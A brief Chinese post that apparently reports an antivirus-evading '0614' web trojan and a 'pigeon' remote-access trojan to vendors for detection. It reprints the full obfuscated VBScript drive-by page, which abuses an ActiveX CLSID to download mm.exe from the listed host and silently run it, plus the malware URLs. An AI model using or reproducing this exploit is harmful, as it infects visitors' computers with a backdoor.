发现免杀的0614网马和免杀鸽子 请查杀
0614网马地址:http://www.027shop.com/gezi/gezi.htm
<html>
<script language="VBScript">
<!--
on error resume next
Dim mylove
Set y = Nothing
Safe="obj"
Angel="ect"
Jing=Safe&Angel
Set data = document.createElement(Jing,"")
data.setAttribute ("classid"), ("clsid:BD96C556-65A3-11D0-983A-00C04FC29E36")
Love ="Micro"
Love0 ="delm"
Love1 ="soft.XMLHTTP"
Zhao =Love&Love1
result = Null And Null
Set My = data.Create
Object(Zhao,"")
set Go = data.create
object("Adodb.Stream","")
Go.type = 1
Go.open
SafeAngel = "http://www.027shop.com/gezi/mm.exe"
ilovejing="GET"
My.Open ilovejing, SafeAngel, False
My.Send
exe="mylove.bat"
Blog1 ="Scrip"
Blog2 ="ting.FileSystem"
Blog3 ="
Object"
Blog =Blog1&Blog2&Blog3
Go.write My.responseBody
set F = data.create
object(Blog,"")
Set T = Nothing
set tmp = F.GetSpecialFolder(2)
exe= F.BuildPath(tmp,exe)
Go.savetofile exe,2
Go.close
set Bb = data.create
object("Shell.Application","")
Bb.ShellExecute exe,"","","open",0
-->
</script>
<script type="text/jscript">
function init() {
document.write("");
}
window.
onload = init;
</script>
<p><font size="5">请按 <font color="#FF0000"><b>F5</b></font> 刷新,精彩内容就会出现</font></p>
</html>
http://www.027shop.com/gezi/111.swf
鸽子地址:http://www.027shop.com/gezi/mm.exe
